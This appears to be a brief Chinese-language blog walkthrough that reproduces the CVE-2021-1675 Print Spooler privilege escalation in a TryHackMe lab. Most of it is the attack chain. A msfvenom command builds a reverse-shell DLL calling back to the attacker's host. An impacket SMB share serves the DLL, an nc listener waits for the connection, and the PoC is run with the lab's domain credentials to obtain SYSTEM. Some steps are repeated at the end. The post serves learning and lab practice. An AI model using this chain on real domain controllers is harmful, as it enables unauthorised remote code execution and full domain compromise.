Windows Print Spooler (CVE-2021-1675 域提權)
CVE-2021-1675(Windows Print Spooler 域提權)
前言 :
最近在碰 AD 方面各種攻擊手法,也在網路上查查近年爆出的 CVE 漏洞,CVE 編號是 CVE-2021-1675,之後碰到 AD 環境多了一招的概念,趁空閒時復現一下此漏洞。
內容 :
直接利用 Tryhackme 環境(懶的搭了XD
實作環境 :
kali : 10.9.1.117
DC : 10.10.15.24 (擁有 noth 域用戶,密碼 1qaz@WSX)
kali 產生反連 .dll。
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.9.1.117 LPORT=443 -f dll -o /tmp/poc.dll
SMB 開啟共享。
impacket-smbserver smb /tmp/
本地 nc 監聽。
nc -lvvp 443
執行 PoC (會報錯,不過好像是正常 ?
python3 CVE-2021-1675.py CONTROLLER.local/noth:1qaz@WSX@10.10.15.24 '\\10.9.1.117\smb\shell.dll'
成功取得 System 權限。
實戰中應該會遇到 SMBV1 沒有開啟的問題,再看看要怎麼解決。
SMB 開啟共享。
impacket-smbserver smb /tmp/
執行 PoC (會報錯,不過好像是正常 ?
python3 CVE-2021-1675.py CONTROLLER.local/noth:1qaz@WSX@10.10.15.24 '\\10.9.1.117\smb\shell.dll'
留言
張貼留言